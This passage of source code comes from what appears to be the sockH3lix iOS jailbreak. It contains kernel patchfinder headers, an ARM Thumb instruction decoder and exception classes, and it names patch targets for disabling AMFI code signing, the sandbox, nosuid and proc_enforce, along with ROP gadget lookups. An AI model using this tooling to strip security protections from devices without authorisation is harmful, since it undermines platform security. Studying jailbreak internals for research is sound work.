47 | void addtodict(uint8_t c);
48 | void nextflagbit();
49 | void setcounter(uint8_t first, uint8_t second);
50 | };
51 |
52 | static const uint64_t lzss_magic = 0x636f6d706c7a7373;
53 |
54 | struct lzss_hdr {
55 | uint64_t magic;
56 | uint32_t checksum;
57 | uint32_t size;
58 | uint32_t src_size;
59 | uint32_t unk1;
60 | uint8_t padding[0x168];
61 | };
62 |
63 | #ifdef __APPLE__
64 |
65 | #include
66 |
67 | #define htobe16(x) OSSwapHostToBigInt16(x)
68 | #define htole16(x) OSSwapHostToLittleInt16(x)
69 | #define be16toh(x) OSSwapBigToHostInt16(x)
70 | #define le16toh(x) OSSwapLittleToHostInt16(x)
71 |
72 | #define htobe32(x) OSSwapHostToBigInt32(x)
73 | #define htole32(x) OSSwapHostToLittleInt32(x)
74 | #define be32toh(x) OSSwapBigToHostInt32(x)
75 | #define le32toh(x) OSSwapLittleToHostInt32(x)
76 |
77 | #define htobe64(x) OSSwapHostToBigInt64(x)
78 | #define htole64(x) OSSwapHostToLittleInt64(x)
79 | #define be64toh(x) OSSwapBigToHostInt64(x)
80 | #define le64toh(x) OSSwapLittleToHostInt64(x)
81 |
82 | #else
83 | #include
84 | #endif
85 |
86 | #else
87 | extern int g_debug;
88 | #endif
89 |
90 | #endif
91 |
92 |
--------------------------------------------------------------------------------
/liboffsetfinder32/offsetfinder32.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // offsetfinder32.hpp
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/12/19.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef offsetfinder32_hpp
10 | #define offsetfinder32_hpp
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 |
17 | namespace CR {
18 | typedef uint8_t *loc_t;
19 | typedef uintptr_t addr_t;
20 | class offsetfinder32 {
21 | private:
22 | using patch = tihmstar::patchfinder64::patch;
23 | struct {
24 | loc_t _bcopy;
25 | loc_t _release_arm;
26 | loc_t _sbops;
27 | loc_t _bcopy_phys;
28 | loc_t _pmap_find_phys;
29 | loc_t _kernel_map;
30 | loc_t _kernel_pmap;
31 | patch _i_can_has_debugger_patch_off;
32 | std::vector _amfi_substrate_patch;
33 | patch _proc_enforce;
34 | patch _cs_enforcement_disable_amfi;
35 | patch _remount_patch_offset;
36 | std::vector _nosuid_off;
37 | patch _amfi_patch_offsets;
38 | patch _lwvm_patch_offsets;
39 | };
40 | uint8_t *kernel = NULL;
41 | size_t kernel_size = 0;
42 | addr_t xnucore_base = 0;
43 | addr_t xnucore_size = 0;
44 | addr_t prelink_base = 0;
45 | addr_t prelink_size = 0;
46 | addr_t pplcode_base = 0;
47 | addr_t pplcode_size = 0;
48 | addr_t cstring_base = 0;
49 | addr_t cstring_size = 0;
50 | addr_t pstring_base = 0;
51 | addr_t pstring_size = 0;
52 | addr_t kerndumpbase = -1;
53 | addr_t kernel_entry = 0;
54 | void *kernel_mh = 0;
55 | addr_t kernel_delta = 0;
56 | addr_t const_base = 0;
57 | addr_t const_size = 0;
58 | addr_t oslstring_base = 0;
59 | addr_t oslstring_size = 0;
60 | addr_t data_base = 0;
61 | addr_t data_size = 0;
62 |
63 | loc_t find_symbol(const char *symbol) const;
64 | loc_t _find_syscall0() const;
65 |
66 | std::vector _find_amfi_substrate_patch();
67 | patch _find_i_can_has_debugger_patch_off();
68 | patch _find_lwvm_patch_offsets();
69 | patch _find_proc_enforce();
70 | patch _find_cs_enforcement_disable_amfi();
71 | patch _find_remount_patch_offset();
72 | std::vector _find_nosuid_off();
73 | patch _find_amfi_patch_offsets();
74 |
75 | loc_t _find_release_arm() const;
76 | loc_t _find_kernel_map() const;
77 | loc_t _find_sbops() const;
78 | loc_t _find_bcopy_phys() const;
79 | loc_t _find_pmap_find_phys() const;
80 | loc_t _find_kernel_pmap() const;
81 | public:
82 | offsetfinder32(const char *filename);
83 |
84 | inline loc_t linker_base() const {
85 | return (loc_t)0x80001000;
86 | }
87 |
88 | constexpr inline loc_t find_kernel_map() const {
89 | return _kernel_map;
90 | }
91 | constexpr inline loc_t find_bcopy() const {
92 | return _bcopy;
93 | }
94 | constexpr inline loc_t find_release_arm() const {
95 | return _release_arm;
96 | }
97 | constexpr inline loc_t find_sbops() const {
98 | return _sbops;
99 | }
100 | constexpr inline loc_t find_bcopy_phys() const {
101 | return _bcopy_phys;
102 | }
103 | constexpr inline loc_t find_pmap_find_phys() const {
104 | return _pmap_find_phys;
105 | }
106 | constexpr inline loc_t find_kernel_pmap() const {
107 | return _kernel_pmap;
108 | }
109 |
110 | constexpr inline const patch &find_i_can_has_debugger_patch_off() const {
111 | return _i_can_has_debugger_patch_off;
112 | }
113 |
114 |
115 | loc_t find_zone_map() const;
116 |
117 | loc_t find_realhost() const;
118 | loc_t find_kernel_task() const;
119 | size_t find_sizeof_task() const;
120 | uint32_t find_proc_ucred() const;
121 | loc_t find_rop_add_r0_r0_0x40() const;
122 | loc_t find_IOMalloc() const;
123 | loc_t find_IOFree() const;
124 | loc_t find_panic() const;
125 | uintptr_t find_vtab_get_external_trap_for_index() const;
126 |
127 | loc_t find_gPhysBase() const;
128 |
129 | patch find_sandbox_patch();
130 |
131 | inline std::vector all_patches() const {
132 | return {
133 | _i_can_has_debugger_patch_off,
134 | _remount_patch_offset,
135 | _lwvm_patch_offsets,
136 | _nosuid_off[0],
137 | _nosuid_off[1],
138 | _proc_enforce,
139 | _cs_enforcement_disable_amfi,
140 | _amfi_patch_offsets,
141 | _amfi_substrate_patch[0],
142 | _amfi_substrate_patch[1],
143 | };
144 | }
145 | };
146 |
147 | }
148 |
149 | #endif /* offsetfinder32_h */
150 |
--------------------------------------------------------------------------------
/liboffsetfinder32/patchfinder32.c:
--------------------------------------------------------------------------------
1 | //
2 | // patchfinder32.c
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/12/20.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 |
9 | #include "patchfinder32.h"
10 | #include
11 |
12 |
13 | #define HAS_BITS(a,b) (((a) & (b)) == (b))
14 |
15 | static uint32_t
16 | bit_range(uint32_t x, int start, int end) {
17 | x = (x << (31 - start)) >> (31 - start);
18 | x = (x >> end);
19 | return x;
20 | }
21 |
22 | static uint32_t
23 | ror(uint32_t x, int places) {
24 | return (x >> places) | (x << (32 - places));
25 | }
26 |
27 | static int
28 | thumb_expand_imm_c(uint16_t imm12) {
29 | if(bit_range(imm12, 11, 10) == 0) {
30 | switch(bit_range(imm12, 9, 8)) {
31 | case 0:
32 | return bit_range(imm12, 7, 0);
33 | case 1:
34 | return (bit_range(imm12, 7, 0) << 16) | bit_range(imm12, 7, 0);
35 | case 2:
36 | return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 8);
37 | case 3:
38 | return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 16) | (bit_range(imm12, 7, 0) << 8) | bit_range(imm12, 7, 0);
39 | default:
40 | return 0;
41 | }
42 | } else {
43 | uint32_t unrotated_value = 0x80 | bit_range(imm12, 6, 0);
44 | return ror(unrotated_value, bit_range(imm12, 11, 7));
45 | }
46 | }
47 |
48 | int
49 | insn_is_32bit(uint16_t* i) {
50 | return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0;
51 | }
52 |
53 |
54 | int
55 | insn_is_add_reg(uint16_t* i) {
56 | if((*i & 0xFE00) == 0x1800)
57 | return 1;
58 | else if((*i & 0xFF00) == 0x4400)
59 | return 1;
60 | else if((*i & 0xFFE0) == 0xEB00)
61 | return 1;
62 | else
63 | return 0;
64 | }
65 |
66 | int
67 | insn_add_reg_rd(uint16_t* i) {
68 | if((*i & 0xFE00) == 0x1800)
69 | return (*i & 7);
70 | else if((*i & 0xFF00) == 0x4400)
71 | return (*i & 7) | ((*i & 0x80) >> 4) ;
72 | else if((*i & 0xFFE0) == 0xEB00)
73 | return (*(i + 1) >> 8) & 0xF;
74 | else
75 | return 0;
76 | }
77 |
78 | int
79 | insn_add_reg_rm(uint16_t* i) {
80 | if((*i & 0xFE00) == 0x1800)
81 | return (*i >> 6) & 7;
82 | else if((*i & 0xFF00) == 0x4400)
83 | return (*i >> 3) & 0xF;
84 | else if((*i & 0xFFE0) == 0xEB00)
85 | return *(i + 1) & 0xF;
86 | else
87 | return 0;
88 | }
89 |
90 | int
91 | insn_is_mov_imm(uint16_t* i) {
92 | if((*i & 0xF800) == 0x2000)
93 | return 1;
94 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
95 | return 1;
96 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
97 | return 1;
98 | else
99 | return 0;
100 | }
101 |
102 | int
103 | insn_mov_imm_rd(uint16_t* i) {
104 | if((*i & 0xF800) == 0x2000)
105 | return (*i >> 8) & 7;
106 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
107 | return (*(i + 1) >> 8) & 0xF;
108 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
109 | return (*(i + 1) >> 8) & 0xF;
110 | else
111 | return 0;
112 | }
113 |
114 | int
115 | insn_mov_imm_imm(uint16_t* i) {
116 | if((*i & 0xF800) == 0x2000)
117 | return *i & 0xF;
118 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
119 | return thumb_expand_imm_c(((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF));
120 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
121 | return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
122 | else
123 | return 0;
124 | }
125 |
126 | int
127 | insn_is_movt(uint16_t* i) {
128 | return (*i & 0xFBF0) == 0xF2C0 && (*(i + 1) & 0x8000) == 0;
129 | }
130 |
131 | int
132 | insn_movt_rd(uint16_t* i) {
133 | return (*(i + 1) >> 8) & 0xF;
134 | }
135 |
136 | int
137 | insn_movt_imm(uint16_t* i) {
138 | return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
139 | }
140 |
141 | int
142 | insn_is_ldr_imm(uint16_t* i) {
143 | uint8_t opA = bit_range(*i, 15, 12);
144 | uint8_t opB = bit_range(*i, 11, 9);
145 |
146 | return opA == 6 && (opB & 4) == 4;
147 | }
148 |
149 | int
150 | insn_is_ldr_literal(uint16_t *i) {
151 | return (*i >> 11) == 0b01001;
152 | }
153 |
154 | int
155 | insn_is_adr(uint16_t *i) {
156 | return HAS_BITS(*i, 0b10100 << 11);
157 | }
158 |
159 |
160 | int
161 | insn_is_pop(uint16_t *i) {
162 | return (*i >> 9) == 0b1011110;
163 | }
164 |
165 | int
166 | insn_is_push(uint16_t *i) {
167 | return HAS_BITS(*i, 0b1011010 << 9);
168 | }
169 |
170 | int
171 | insn_is_thumb2_pop(uint16_t *i) {
172 | return (*i == 0xe8bd);
173 | }
174 |
175 | int
176 | insn_is_thumb2_tst(uint16_t *i) {
177 | return !insn_is_bl(i) && (((*i >> 5) & ~(0b100000)) == 0b11110000000);
178 | }
179 |
180 | int
181 | insn_tst_imm(uint16_t *i) {
182 | return *(i+1) % (1<<8);
183 | }
184 |
185 | int
186 | insn_is_thumb2_push(uint16_t *i) {
187 | return (*i == 0xe92d);
188 | }
189 |
190 | int
191 | insn_is_thumb2_ldr(uint16_t *i) {
192 | return HAS_BITS(*i, 0b111110001101 << 4);
193 | }
194 |
195 | int
196 | insn_ldr_imm_rt(uint16_t* i) {
197 | return (*i & 7);
198 | }
199 |
200 | int
201 | insn_ldr_imm_imm(uint16_t* i) {
202 | return (((*i >> 6) & 0x1F) << 2);
203 | }
204 |
205 | int
206 | insn_thumb2_ldr_imm_imm(uint16_t* i) {
207 | return *(i+1) % (1<<12);
208 | }
209 |
210 | int
211 | insn_is_bl(uint16_t* i) {
212 | if ((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd000) == 0xd000) {
213 | return 1;
214 | } else if ((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd001) == 0xc000) {
215 | return 1;
216 | } else {
217 | return 0;
218 | }
219 | }
220 |
221 | int
222 | insn_is_thumb2_branch(uint16_t *i) {
223 | return (*i >>11 == 0b11110) && (*(i+1)>>15 == 0b1);
224 | }
225 |
226 | int
227 | insn_is_thumb_branch(uint16_t *i) {
228 | return ((*i >>11 == 0b11100) || (*i >>12 == 0b1101));
229 | }
230 |
231 | int
232 | insn_is_thumb2_bne(uint16_t *i) {
233 | return HAS_BITS(*i >>6, 0b1111000001) && (*(i+1)>>15 == 0b1);
234 | }
235 |
236 | int
237 | insn_is_thumb2_beqw(uint16_t *i) {
238 | return HAS_BITS(*i >>6, 0b1111000000) && (*(i+1)>>15 == 0b1);
239 | }
240 |
241 | int
242 | insn_is_thumb2_orr(uint16_t *i) {
243 | return HAS_BITS((*i)>>5, 0b11110000010) && (*(i+1) >> 15 == 0);
244 | }
245 |
246 | int
247 | insn_is_thumb2_strw(uint16_t *i) {
248 | return (*i >> 4) == 0b111110001100;
249 | }
250 |
251 | int
252 | insn_is_thumb2_add(uint16_t *i) {
253 | return (((*i >> 5) & ~(1<<5)) == 0b11110001000 && (*(i+1) >> 15) == 0);
254 | }
255 |
256 | uint8_t
257 | insn_thumb2_orr_rn(uint16_t *i) {
258 | return *i % (1<<4);
259 | }
260 |
261 | uint8_t
262 | insn_ldr_literal_rt(uint16_t *i) {
263 | return (*i >> 8) % (1 << 3);
264 | }
265 |
266 | uint8_t
267 | insn_ldr_literal_imm(uint16_t *i) {
268 | return *i % (1 << 8);
269 | }
270 |
271 | uint8_t
272 | insn_adr_rd(uint16_t *i) {
273 | return (*i >> 8) % (1 << 3);
274 | }
275 |
276 | uint8_t
277 | insn_adr_imm(uint16_t *i) {
278 | return *i % (1 << 8);
279 | }
280 |
281 | uint8_t
282 | insn_thumb2_orr_rd(uint16_t *i) {
283 | return (*(i+1) >> 8) % (1 << 4);
284 | }
285 |
286 | uint8_t
287 | insn_thumb2_orr_imm(uint16_t *i) {
288 | return *(i+1) % (1<<8);
289 | }
290 |
291 | uint8_t
292 | insn_thumb2_strw_rn(uint16_t *i) {
293 | return *i % (1<<4);
294 | }
295 |
296 | uint8_t
297 | insn_thumb2_strw_rt(uint16_t *i) {
298 | return *(i+1) >> 12;
299 | }
300 |
301 | uint8_t
302 | insn_thumb2_strw_imm(uint16_t *i) {
303 | return *(i+1) % (1 << 12);
304 | }
305 |
306 | uint8_t
307 | insn_thumb2_add_rn(uint16_t *i) {
308 | return *i % (1 << 4);
309 | }
310 |
311 | uint8_t
312 | insn_thumb2_add_rd(uint16_t *i) {
313 | return (*(i+1) >> 8) % (1 << 4);
314 | }
315 |
316 | uint8_t
317 | insn_thumb2_add_imm(uint16_t *i) {
318 | return *(i+1) % (1 << 8);
319 | }
320 |
321 | uint32_t
322 | insn_thumb2_branch_imm(uint16_t *i) {
323 | uint32_t imm6 = (*i % (1<<6));
324 | uint32_t imm11 = *(i+1) % (1<<11);
325 | return (imm6<<11) | imm11;
326 | }
327 |
328 | uint32_t
329 | insn_thumb_branch_imm(uint16_t *i) {
330 | if (*i >>11 == 0b11100) {
331 | return *i % (1<<11);
332 | }else{
333 | return *i % (1<<8);
334 | }
335 | }
336 |
337 | uint32_t
338 | insn_bl_imm32(uint16_t* i) {
339 | uint16_t insn0 = *i;
340 | uint16_t insn1 = *(i + 1);
341 | uint32_t s = (insn0 >> 10) & 1;
342 | uint32_t j1 = (insn1 >> 13) & 1;
343 | uint32_t j2 = (insn1 >> 11) & 1;
344 | uint32_t i1 = ~(j1 ^ s) & 1;
345 | uint32_t i2 = ~(j2 ^ s) & 1;
346 | uint32_t imm10 = insn0 & 0x3ff;
347 | uint32_t imm11 = insn1 & 0x7ff;
348 | uint32_t imm32 = (imm11 << 1) | (imm10 << 12) | (i2 << 22) | (i1 << 23) | (s ? 0xff000000 : 0);
349 | return imm32;
350 | }
351 |
352 | uint16_t *
353 | find_rel_branch_ref(uint16_t* start, size_t len, int step, int (*branch_check_func)(uint16_t*), int32_t (*branch_imm_func)(uint16_t*)) {
354 | for (uint16_t *i = start; len > sizeof(uint16_t); len -= abs(step) * sizeof(uint16_t), i += step) {
355 | if (branch_check_func(i)) {
356 | int32_t imm = (branch_imm_func(i)+2)*2;
357 | uint8_t *dst = imm + (uint8_t*)i;
358 | if (dst == (uint8_t*)start) {
359 | return i;
360 | }
361 | }
362 | }
363 | return 0;
364 | }
365 |
366 | uint16_t*
367 | find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint32_t address) {
368 |
369 | for (uint16_t *p = (uint16_t*)kdata; (uintptr_t)p < (uintptr_t)kdata + ksize; p++) {
370 | if (insn_add_reg_rm(p) == 15){
371 | int rd = insn_add_reg_rd(p);
372 | uint32_t val = 0;
373 | uint8_t* pc = (uint8_t*)((uint8_t*)p - kdata + region);
374 | for (uint16_t *pp = p; (uintptr_t)pp > (uintptr_t)kdata; pp--) {
375 |
376 | if (insn_is_32bit(pp) && insn_is_movt(pp) && insn_movt_rd(pp) == rd && !(val >> 16)){
377 | val |= insn_movt_imm(pp) << 16;
378 | } else if (insn_is_32bit(pp) && insn_is_mov_imm(pp) && insn_mov_imm_rd(pp) == rd && !(val & ((1 << 16) - 1))){
379 | val |= insn_mov_imm_imm(pp);
380 | } else if (insn_is_ldr_literal(pp) && insn_ldr_literal_rt(pp) == rd){
381 | val = (insn_ldr_literal_imm(pp) * 4 + 2);
382 | if (insn_is_32bit(pp))
383 | val += 2;
384 | val = *(uint32_t*)(((uintptr_t)p + val) & ~3);
385 | break;
386 | } else if (insn_is_push(pp)){
387 | val = 0;
388 | break;
389 | }
390 | if (val >> 16 && (val & ((1 << 16) - 1)))
391 | break;
392 | }
393 | if (!val) {
394 | continue;
395 | }
396 | uint8_t* ref = pc + 4 + val;
397 | if ((uintptr_t)ref == address + region)
398 | return p;
399 | }
400 | }
401 | return 0;
402 | }
403 |
--------------------------------------------------------------------------------
/liboffsetfinder32/patchfinder32.h:
--------------------------------------------------------------------------------
1 | //
2 | // patchfinder32.h
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/12/20.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef patchfinder32_h
10 | #define patchfinder32_h
11 |
12 | #include
13 | #include
14 |
15 | __BEGIN_DECLS
16 |
17 | int insn_is_32bit(uint16_t* i);
18 |
19 | int insn_is_add_reg(uint16_t* i);
20 | int insn_add_reg_rd(uint16_t* i);
21 | int insn_add_reg_rm(uint16_t* i);
22 |
23 | int insn_is_mov_imm(uint16_t* i);
24 | int insn_mov_imm_rd(uint16_t* i);
25 | int insn_mov_imm_imm(uint16_t* i);
26 |
27 | int insn_is_movt(uint16_t* i);
28 | int insn_movt_rd(uint16_t* i);
29 | int insn_movt_imm(uint16_t* i);
30 |
31 | int insn_is_ldr_imm(uint16_t* i);
32 | int insn_ldr_imm_rt(uint16_t* i);
33 | int insn_ldr_imm_imm(uint16_t* i);
34 | int insn_thumb2_ldr_imm_imm(uint16_t* i);
35 |
36 |
37 | int insn_is_bl(uint16_t* i);
38 | int insn_is_thumb2_branch(uint16_t *i);
39 | int insn_is_thumb_branch(uint16_t *i);
40 | int insn_is_thumb2_bne(uint16_t *i);
41 | int insn_is_thumb2_beqw(uint16_t *i);
42 | int insn_is_thumb2_orr(uint16_t *i);
43 | int insn_is_thumb2_strw(uint16_t *i);
44 | int insn_is_thumb2_add(uint16_t *i);
45 | int insn_is_ldr_literal(uint16_t *i);
46 |
47 | int insn_is_adr(uint16_t *i);
48 |
49 |
50 | uint8_t insn_thumb2_orr_rn(uint16_t *i);
51 | uint8_t insn_thumb2_orr_rd(uint16_t *i);
52 | uint8_t insn_thumb2_orr_imm(uint16_t *i);
53 | uint8_t insn_thumb2_strw_rn(uint16_t *i);
54 | uint8_t insn_thumb2_strw_rt(uint16_t *i);
55 | uint8_t insn_thumb2_strw_imm(uint16_t *i);
56 | uint8_t insn_thumb2_add_rn(uint16_t *i);
57 | uint8_t insn_thumb2_add_rd(uint16_t *i);
58 | uint8_t insn_thumb2_add_imm(uint16_t *i);
59 | uint8_t insn_ldr_literal_rt(uint16_t *i);
60 | uint8_t insn_ldr_literal_imm(uint16_t *i);
61 | uint8_t insn_adr_rd(uint16_t *i);
62 | uint8_t insn_adr_imm(uint16_t *i);
63 |
64 | uint32_t insn_thumb2_branch_imm(uint16_t *i);
65 | uint32_t insn_thumb_branch_imm(uint16_t *i);
66 |
67 |
68 | uint32_t insn_bl_imm32(uint16_t* i);
69 |
70 | int insn_is_pop(uint16_t *i);
71 | int insn_is_push(uint16_t *i);
72 | int insn_is_thumb2_ldr(uint16_t *i);
73 | int insn_is_thumb2_pop(uint16_t *i);
74 | int insn_is_thumb2_push(uint16_t *i);
75 | int insn_is_thumb2_tst(uint16_t *i);
76 | int insn_tst_imm(uint16_t *i);
77 |
78 | uint16_t *find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint32_t address);
79 | uint16_t *
80 | find_rel_branch_ref(uint16_t* start, size_t len, int step, int (*branch_check_func)(uint16_t*), int32_t (*branch_imm_func)(uint16_t*));
81 |
82 | __END_DECLS
83 |
84 | #endif /* patchfinder32_h */
85 |
--------------------------------------------------------------------------------
/liboffsetfinder64/all_liboffsetfinder.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // all_liboffsetfinder.hpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef all_liboffsetfinder_h
10 | #define all_liboffsetfinder_h
11 |
12 | #define OFFSETFINDER64_VERSION_COMMIT_COUNT "Release"
13 | #define OFFSETFINDER64_VERSION_COMMIT_SHA "Build: " __DATE__ " " __TIME__
14 | #define BIT_RANGE(v,begin,end) ( ((v)>>(begin)) % (1 << ((end)-(begin)+1)) )
15 | #define BIT_AT(v,pos) ( (v >> pos) % 2 )
16 |
17 | #define info(a ...) ({printf(a),printf("\n");})
18 | #define log(a ...) ({if (dbglog) printf(a),printf("\n");})
19 | #define warning(a ...) ({if (dbglog) printf("[WARNING] "), printf(a),printf("\n");})
20 | #define error(a ...) ({printf("[Error] "),printf(a),printf("\n");})
21 |
22 | #define safeFree(ptr) ({if (ptr) free(ptr),ptr=NULL;})
23 |
24 | #define reterror(err) throw tihmstar::exception(__LINE__, err, LOCAL_FILENAME)
25 | #define retcustomerror(err,except) throw tihmstar::except(__LINE__, err, LOCAL_FILENAME)
26 | #define assure(cond) if ((cond) == 0) throw tihmstar::exception(__LINE__, "assure failed", LOCAL_FILENAME)
27 | #define doassure(cond,code) do {if (!(cond)){(code);assure(cond);}} while(0)
28 | #define retassure(cond, err) if ((cond) == 0) throw tihmstar::exception(__LINE__,err,LOCAL_FILENAME)
29 | #define assureclean(cond) do {if (!(cond)){clean();assure(cond);}} while(0)
30 |
31 |
32 | #endif /* all_liboffsetfinder_h */
33 |
--------------------------------------------------------------------------------
/liboffsetfinder64/common.h:
--------------------------------------------------------------------------------
1 | //
2 | // common.h
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef common_h
10 | #define common_h
11 |
12 | #include
13 | #include
14 |
15 | namespace tihmstar{
16 | namespace patchfinder64{
17 | typedef uint8_t* loc_t;
18 | typedef uint64_t offset_t;
19 |
20 | struct text_t{
21 | patchfinder64::loc_t map;
22 | size_t size;
23 | patchfinder64::loc_t base;
24 | bool isExec;
25 | };
26 | using segment_t = std::vector;
27 | }
28 | }
29 |
30 | #endif /* common_h */
31 |
--------------------------------------------------------------------------------
/liboffsetfinder64/exception.cpp:
--------------------------------------------------------------------------------
1 | //
2 | // exception.cpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #include "all_liboffsetfinder.hpp"
10 | #include
11 | #include
12 |
13 | using namespace tihmstar;
14 |
15 | exception::exception(int code, std::string err, std::string filename) :
16 | _err(err),
17 | _code(code),
18 | _build_commit_count(OFFSETFINDER64_VERSION_COMMIT_COUNT),
19 | _build_commit_sha(OFFSETFINDER64_VERSION_COMMIT_SHA),
20 | _filename(filename){};
21 |
22 | const char *exception::what(){
23 | return _err.c_str();
24 | }
25 |
26 | int exception::code() const{
27 | return _code | (int)(_filename.size()<<16);
28 | }
29 |
30 | const std::string& exception::build_commit_count() const {
31 | return _build_commit_count;
32 | };
33 |
34 | const std::string& exception::build_commit_sha() const {
35 | return _build_commit_sha;
36 | };
37 |
38 | out_of_range::out_of_range(std::string err) : exception(__LINE__, err, "exception.cpp"){};
39 |
40 | symbol_not_found::symbol_not_found(int code, std::string sym, std::string filename) : exception(code,{"failed to find symbol: " + sym},filename) {};
41 |
42 | load_command_not_found::load_command_not_found(int code, int cmd, std::string filename) : exception(code,{"failed to find cmd: " + std::to_string(cmd)},filename), _cmd(cmd) {};
43 | int load_command_not_found::cmd() const { return _cmd;};
44 |
45 | symtab_not_found::symtab_not_found(int code, std::string err, std::string filename) : exception(code,err,filename) {};
46 |
47 | limit_reached::limit_reached(int code, std::string err, std::string filename) : exception(code,err,filename) {};
48 |
49 | bad_branch_destination::bad_branch_destination(int code, std::string err, std::string filename) : exception(code,err,filename) {};
50 |
51 |
--------------------------------------------------------------------------------
/liboffsetfinder64/exception.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // exception.hpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef exception_hpp
10 | #define exception_hpp
11 |
12 | #include
13 |
14 | namespace tihmstar {
15 | class exception : public std::exception{
16 | std::string _err;
17 | int _code;
18 | std::string _build_commit_count;
19 | std::string _build_commit_sha;
20 | std::string _filename;
21 | public:
22 | exception(int code, std::string err, std::string filename);
23 |
24 | //custom error can be used
25 | const char *what();
26 |
27 | /*
28 | -first lowest two bytes of code is sourcecode line
29 | -next two bytes is strlen of filename in which error happened
30 | */
31 | int code() const;
32 |
33 | //Information about build
34 | const std::string& build_commit_count() const;
35 | const std::string& build_commit_sha() const;
36 | };
37 |
38 | //custom exceptions for makeing it easy to catch
39 | class out_of_range : public exception{
40 | public:
41 | out_of_range(std::string err);
42 | };
43 |
44 | class symbol_not_found : public exception{
45 | public:
46 | symbol_not_found(int code, std::string sym, std::string filename);
47 | };
48 |
49 | class load_command_not_found : public exception{
50 | int _cmd;
51 | public:
52 | int cmd() const;
53 | load_command_not_found(int code, int cmd, std::string filename);
54 | };
55 |
56 | class symtab_not_found : public exception{
57 | public:
58 | symtab_not_found(int code, std::string err, std::string filename);
59 | };
60 |
61 | class limit_reached : public exception{
62 | public:
63 | limit_reached(int code, std::string err, std::string filename);
64 | };
65 |
66 | class bad_branch_destination : public exception{
67 | public:
68 | bad_branch_destination(int code, std::string err, std::string filename);
69 | };
70 |
71 | };
72 |
73 | #endif /* exception_hpp */
74 |
--------------------------------------------------------------------------------
/liboffsetfinder64/insn.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // insn.hpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef insn_hpp
10 | #define insn_hpp
11 |
12 | #include
13 | #include
14 |
15 | namespace tihmstar{
16 | namespace patchfinder64{
17 | class insn{
18 | public:
19 | enum segtype{
20 | kText_only,
21 | kData_only,
22 | kText_and_Data
23 | };
24 | private:
25 | std::pair _p;
26 | std::vector _segments;
27 | segtype _segtype;
28 | public:
29 | insn(segment_t segments, loc_t p = 0, segtype segType = kText_only);
30 | insn(const insn &cpy, loc_t p=0);
31 | insn &operator++();
32 | insn &operator--();
33 | insn operator+(int i);
34 | insn operator-(int i);
35 | insn &operator+=(int i);
36 | insn &operator-=(int i);
37 | insn &operator=(loc_t p);
38 |
39 | public: //helpers
40 | uint64_t pc();
41 | uint32_t value();
42 | uint64_t doublevalue();
43 |
44 | public: //static type determinition
45 | static uint64_t deref(segment_t segments, loc_t p);
46 | static bool is_adrp(uint32_t i);
47 | static bool is_adr(uint32_t i);
48 | static bool is_add(uint32_t i);
49 | static bool is_bl(uint32_t i);
50 | static bool is_cbz(uint32_t i);
51 | static bool is_ret(uint32_t i);
52 | static bool is_tbnz(uint32_t i);
53 | static bool is_br(uint32_t i);
54 | static bool is_ldr(uint32_t i);
55 | static bool is_cbnz(uint32_t i);
56 | static bool is_movk(uint32_t i);
57 | static bool is_orr(uint32_t i);
58 | static bool is_tbz(uint32_t i);
59 | static bool is_ldxr(uint32_t i);
60 | static bool is_ldrb(uint32_t i);
61 | static bool is_str(uint32_t i);
62 | static bool is_stp(uint32_t i);
63 | static bool is_movz(uint32_t i);
64 | static bool is_bcond(uint32_t i);
65 | static bool is_b(uint32_t i);
66 | static bool is_nop(uint32_t i);
67 |
68 | public: //type
69 | enum type{
70 | unknown,
71 | adrp,
72 | adr,
73 | bl,
74 | cbz,
75 | ret,
76 | tbnz,
77 | add,
78 | br,
79 | ldr,
80 | cbnz,
81 | movk,
82 | orr,
83 | tbz,
84 | ldxr,
85 | ldrb,
86 | str,
87 | stp,
88 | movz,
89 | bcond,
90 | b,
91 | nop
92 | };
93 | enum subtype{
94 | st_general,
95 | st_register,
96 | st_immediate,
97 | st_literal
